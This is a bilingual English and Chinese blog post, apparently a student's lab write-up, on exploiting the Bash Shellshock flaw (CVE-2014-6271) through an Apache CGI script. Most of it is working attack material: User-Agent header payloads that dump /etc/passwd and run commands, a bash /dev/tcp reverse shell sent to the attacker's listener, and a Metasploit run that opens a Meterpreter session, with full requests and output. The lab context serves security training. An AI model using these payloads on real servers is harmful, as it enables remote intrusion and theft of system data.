Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)

Posted by r3kind1e on October 17, 2022

Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)

CVE-2014-6271 - Shellshock

Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash Shell (sin V1.3) that allow an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.

The Shellshock vulnerability was discovered by Stephane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.

Bash is a *Nix shell that is part of the GNU project and is the default shell for most Linux distributions.

The Shellshock vulnerability is caused by a vulnerability in Bash, whereby Bash mistakenly executes trailing commands after a series of characters: () {:;};.

This vulnerability only affects Linux as Windows does not use utilize Bash as it is not a *Nix based operating system.

In this context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.

CGI (Common Gateway Interface) scripts are used by Apache to execute arbitrary commands on the Linux system, after which the output is displayed to the client.

Shellshock Exploitation

In order to exploit this vulnerability, you will need to locate an input vector or script that allows you to communicate with Bash.

In the context of an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server.

Whenever a CGI script is executed, the web server will initiate a new process and run the CGI script with Bash.

This vulnerability can be exploited both manually and automatically with the use of an MSF exploit module.

利用 Bash CVE-2014-6271 漏洞 (Shellshock)

CVE-2014-6271 - Shellshock

Shellshock (CVE-2014-6271) 是 Bash Shell (sin V1.3) 中一系列漏洞的名称,这些漏洞允许攻击者通过 Bash 执行远程任意命令,从而允许攻击者获得对目标的远程访问系统通过反向外壳。

Shellshock 漏洞由 Stephane Chazelas 于 2014 年 9 月 12 日发现,并于 2014 年 9 月 24 日公开。

Bash 是一个 *Nix shell,它是 GNU 项目的一部分,并且是大多数 Linux 发行版的默认 shell。

Shellshock 漏洞是由 Bash 中的一个漏洞引起的,即 Bash 错误地执行了一系列字符之后的尾随命令:() {:;};

There is a vulnerability within Bash in regards to the environment variable function decoleration. If these charcters are input into Bash, any other commands executed after these special characters will be execured by Bash.

此漏洞仅影响 Linux,因为 Windows 不使用 Bash,因为它不是基于 *Nix 的操作系统。

在这种远程利用的情况下,配置为运行 CGI 脚本或 .sh 脚本的 Apache Web 服务器也容易受到这种攻击。

Apache 使用 CGI(通用网关接口)脚本在 Linux 系统上执行任意命令,然后将输出显示给客户端。

If you are running an apache Web server, hosting web application, in regardless of wether it is a php or html. You can create or develop CGI script to obtain information from the system. If I want to get current time on Linux server, I can use CGI script to execute time command and redirect the output to the Web page.

If the attacker is able to execute the CGI script, In case of this vulnerability, Pass in these special set of characters as well as additional command you like to execute, you could potentially use this vulnerability to execute arbitray commands that could be malicious.

Shellshock 利用

为了利用此漏洞,您需要找到一个输入向量或脚本,以便您与 Bash 进行通信。

在 Apache Web 服务器的上下文中,我们可以利用 Web 服务器上可访问的任何合法 CGI 脚本。

Because they are interating with Bash or getting Bash to execute some commands, we can send request with this CGI script and get those special character input as well as any other commands that we would like to execute.

每当执行 CGI 脚本时,Web 服务器将启动一个新进程并使用 Bash 运行 CGI 脚本。

Whenever we make an HTTP request for that particular CGI script, the Web server will initiate new process and run the CGI script with Bash. So we can input these special chracters within one of the HTTP headers. The most effective techinique is to input those characters within the User-Agent HTTP header and then specify other commands we would like to execute after those characters.

可以使用 MSF 漏洞利用模块手动和自动利用此漏洞。

Demo: Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)(演示:利用 Bash CVE-2014-6271 漏洞 (Shellshock)

1
2
3
ifconfig

eth1: inet 192.24.241.2 
1
nmap -sV 192.24.241.3

在浏览器中访问:

1
192.24.241.3 

View Page Source

1
192.24.241.3/gettime.cgi
1
nmap -sV 192.24.241.3 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"

将Foxy Proxy切换为Burp Suite。在目录中选择03-Web Application Analysis->burpsuite。

Proxy->Intercept->Intercept is on->Forward->Reload->Send to Repeater

1
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Gain a reverse shell on the target system. We can utilize Bash to connect to a listener on our Kali system.

1
nc -nvlp 1234

Connecting with Bash to our listener.

1
ifconfig
1
User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'

We should get a reverse shell on our listener.

1
daemon@victim-1:/opt/apache/htdocs$ whoami

Get the information regarding to the distribution.

1
daemon@victim-1:/opt/apache/htdocs$ cat /etc/*issue

Kernel information:

1
daemon@victim-1:/opt/apache/htdocs$ uname -a

That is how to exploit this vulnerability manually using Burp Proxy.

How to exploit this vulnerability with the Metasploit Framework.

1
2
3
4
5
6
7
8
9
10
service postgresql start && msfconsole

search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set RHOSTS 192.24.241.3
set TARGETURI /gettime.cgi
exploit

meterpreter > sysinfo

Shellshock

概述

OWASP Top 10是一份意识文档,它概述了 Web 应用程序最关键的安全风险。渗透测试是根据 OWASP TOP 10 标准执行的,以减少/减轻安全风险。

在练习中,我们将重点关注OWASP A9 使用具有已知漏洞缺陷的组件,并对易受CVE-2014-6071攻击的 Web 服务器执行攻击。

目的:利用漏洞,在目标机器上执行任意命令。

指示:

这个实验室是献给你的!此网络上没有其他用户 :)

开始实验室后,您将可以访问 Kali GUI 实例。

你的 Kali 实例有一个 IP 地址为 192.XY2 的接口。运行“ip addr”以了解 X 和 Y 的值。

不要攻击位于 IP 地址 192.XY1 的网关

我自己的思路

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.1.0.6  netmask 255.255.0.0  broadcast 10.1.255.255
        ether 02:42:0a:01:00:06  txqueuelen 0  (Ethernet)
        RX packets 2427  bytes 237106 (231.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2044  bytes 2228288 (2.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.63.27.2  netmask 255.255.255.0  broadcast 192.63.27.255
        ether 02:42:c0:3f:1b:02  txqueuelen 0  (Ethernet)
        RX packets 17  bytes 1486 (1.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 10865  bytes 27489009 (26.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10865  bytes 27489009 (26.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

1
2
3
4
5
6
7
8
9
10
11
root@attackdefense:~# nmap -sV 192.63.27.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-17 09:09 IST
Nmap scan report for target-1 (192.63.27.3)
Host is up (0.000010s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
MAC Address: 02:42:C0:3F:1B:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds

http-shellshock

1
http://192.63.27.3/gettime.cgi
1
nmap -sV --script http-shellshock --script-args uri=/gettime.cgi 192.63.27.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@attackdefense:~# nmap -sV --script http-shellshock --script-args uri=/gettime.cgi 192.63.27.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-17 09:22 IST
Nmap scan report for target-1 (192.63.27.3)
Host is up (0.000010s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_      http://seclists.org/oss-sec/2014/q3/685
MAC Address: 02:42:C0:3F:1B:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.53 seconds

1
2
3
4
5
6
7
8
9
GET /gettime.cgi HTTP/1.1
Host: 192.63.27.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
1
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
1
2
3
4
5
6
7
8
9
GET /gettime.cgi HTTP/1.1
Host: 192.63.27.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 03:58:07 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 957


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
1
2
3
4
5
6
7
8
GET /gettime.cgi HTTP/1.1
Host: 192.151.67.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'id'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.151.67.3/
Connection: close
1
2
3
4
5
6
7
8
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 09:40:49 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 46


uid=1(daemon) gid=1(daemon) groups=1(daemon)
1
2
3
4
5
6
7
8
GET /gettime.cgi HTTP/1.1
Host: 192.151.67.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'ps -ef'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.151.67.3/
Connection: close
1
2
3
4
5
6
7
8
9
10
11
12
13
14
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 09:43:17 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 555


UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 09:27 ?        00:00:00 /usr/bin/python /usr/bin/supervisord -n
root          10       1  0 09:27 ?        00:00:00 /bin/bash /root/startup.sh
daemon        11      10  0 09:27 ?        00:00:00 /opt/apache/bin/httpd -X
daemon        12      11  0 09:27 ?        00:00:00 /opt/apache/bin/httpd -X
daemon      1034      12  0 09:43 ?        00:00:00 /usr/local/bash-4.3.0/bin/bash /opt/apache/htdocs/gettime.cgi
daemon      1035    1034  0 09:43 ?        00:00:00 ps -ef
1
2
3
4
5
root@attackdefense:~# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

断网了,所以重开了实验室。

1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.181.17.2  netmask 255.255.255.0  broadcast 192.181.17.255
        ether 02:42:c0:b5:11:02  txqueuelen 0  (Ethernet)
1
2
3
4
5
6
7
8
9
GET /gettime.cgi HTTP/1.1
Host: 192.181.17.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.181.17.2/1234 0>&1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@attackdefense:~# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.181.17.3.
Ncat: Connection from 192.181.17.3:42242.
bash: cannot set terminal process group (10): Inappropriate ioctl for device
bash: no job control in this shell
daemon@victim-1:/opt/apache/htdocs$ whoami
whoami
daemon
daemon@victim-1:/opt/apache/htdocs$ cat /etc/*issue
cat /etc/*issue
Ubuntu 14.04.6 LTS \n \l

daemon@victim-1:/opt/apache/htdocs$ uname -a
uname -a
Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   1   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   2   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   3   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   4   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   5   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   6   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
   9   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   10  exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   11  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)


msf5 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts 192.181.17.3
rhosts => 192.181.17.3
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /gettime.cgi
targeturi => /gettime.cgi
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 192.181.17.2:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (985320 bytes) to 192.181.17.3
[*] Meterpreter session 1 opened (192.181.17.2:4444 -> 192.181.17.3:57322) at 2022-10-17 10:06:35 +0530

meterpreter > sysinfo
Computer     : 192.181.17.3
OS           : Ubuntu 14.04 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=1, gid=1, euid=1, egid=1
meterpreter > 

解决方案

此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1911.pdf

exploit-CVE-2014-6271